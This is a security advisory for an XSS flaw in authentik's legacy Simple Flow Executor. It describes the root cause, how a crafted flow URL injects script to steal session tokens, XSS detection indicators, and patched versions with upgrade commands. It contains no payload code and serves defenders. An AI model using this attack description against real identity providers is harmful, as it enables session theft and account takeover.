CVE-2026-42849 Overview
CVE-2026-42849 is a Cross-Site Scripting (XSS) vulnerability in authentik, an open-source identity provider. The flaw resides in the AutosubmitStage component of the Simple Flow Executor (SFE), a subsystem designed to maintain compatibility with legacy browsers. Attackers can inject malicious script content that executes within the victim's browser session when interacting with the affected flow stage. The vulnerability is tracked under [CWE-79] and affects authentik releases prior to 2025.12.5 and 2026.2.3. Maintainers patched the issue in those two versions.
Critical Impact
Successful exploitation enables script execution in the context of an authenticated authentik session, exposing identity provider credentials, tokens, and downstream single sign-on integrations.
Affected Products
- authentik versions prior to 2025.12.5 (2025.x branch)
- authentik versions prior to 2026.2.3 (2026.x branch)
- Deployments using the Simple Flow Executor (SFE) with AutosubmitStage
Discovery Timeline
- 2026-06-02 - CVE-2026-42849 published to NVD
- 2026-06-02 - Last updated in NVD database
Technical Details for CVE-2026-42849
Vulnerability Analysis
The vulnerability is a stored or reflected Cross-Site Scripting (XSS) flaw in the AutosubmitStage of authentik's Simple Flow Executor (SFE). The SFE renders authentication flow stages using simplified HTML to support legacy browsers that cannot run the modern JavaScript-based flow executor. To maintain that compatibility, the AutosubmitStage emits form fields and submission logic without applying the same output encoding controls used by the primary executor.
Attackers can supply input that is reflected unescaped into the SFE-rendered page. When the victim's browser parses the page, the injected payload executes inside the authentik origin. Because authentik is an identity provider, an attacker-controlled script can exfiltrate session tokens, intercept SAML or OAuth responses, and pivot into federated applications.
Root Cause
The root cause is improper neutralization of input during web page generation in the AutosubmitStage template path of the SFE. Stage parameters intended to populate auto-submitting forms are interpolated into HTML without adequate contextual encoding. The SFE prioritized legacy browser rendering over the strict templating used by the standard flow executor, removing escaping that would normally block script payloads.
Attack Vector
Exploitation requires network access to the authentik instance and user interaction, typically by enticing a victim to follow a crafted flow URL. The attacker constructs a flow that routes through the SFE and reaches the vulnerable AutosubmitStage with attacker-controlled values. When the victim's browser loads the stage, the injected JavaScript executes under the authentik origin. The scope is changed because the attacker can read or modify data in downstream applications that trust authentik for authentication. See the GitHub Security Advisory GHSA-pgff-5mx8-fqj3 for vendor technical details.
Detection Methods for CVE-2026-42849
Indicators of Compromise
- Unexpected <script> tags, on* event handlers, or javascript: URIs appearing in HTTP responses from /if/flow/ or SFE endpoints serving AutosubmitStage.
- Outbound requests from authenticated user browsers to unfamiliar domains immediately after a flow execution.
- Authentik audit log entries showing flow executions that terminate at AutosubmitStage with abnormal parameter values.
Detection Strategies
- Inspect authentik reverse proxy or ingress logs for flow URLs containing HTML metacharacters such as <, >, ", or encoded equivalents in query strings and form parameters.
- Deploy a web application firewall rule that matches XSS payload patterns targeting authentik flow endpoints, including the /if/flow/ and SFE paths.
- Correlate identity provider session creation events with unexpected token usage from new IP addresses or user agents shortly after flow completion.
Monitoring Recommendations
- Enable verbose flow execution logging in authentik and forward events to a centralized SIEM for analysis against XSS payload signatures.
- Monitor browser Content Security Policy (CSP) violation reports if CSP is enforced on the authentik frontend.
- Alert on administrative or high-privilege accounts completing flows that route through the SFE rather than the standard executor.
How to Mitigate CVE-2026-42849
Immediate Actions Required
- Upgrade authentik to version 2025.12.5 if running the 2025.x branch, or to 2026.2.3 if running the 2026.x branch.
- Audit existing sessions and revoke any tokens issued during the exposure window once patched.
- Rotate any administrator credentials and signing keys that may have been accessible to a compromised browser session.
Patch Information
The authentik maintainers released fixed builds in versions 2025.12.5 and 2026.2.3. Both releases correct the output encoding within the AutosubmitStage of the Simple Flow Executor. Refer to the authentik GitHub Security Advisory for the official fix commit and release notes.
Workarounds
- Disable the Simple Flow Executor where legacy browser support is not required, forcing all clients to use the standard flow executor.
- Restrict access to authentik flow endpoints to trusted networks until the patched version is deployed.
- Enforce a strict Content Security Policy that disallows inline scripts on the authentik origin to limit the impact of injected payloads.
# Upgrade authentik via Helm (example)
helm repo update
helm upgrade authentik authentik/authentik \
--namespace authentik \
--version 2026.2.3
# Or pin the Docker image tag in docker-compose.yml
# image: ghcr.io/goauthentik/server:2026.2.3
docker compose pull
docker compose up -d
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
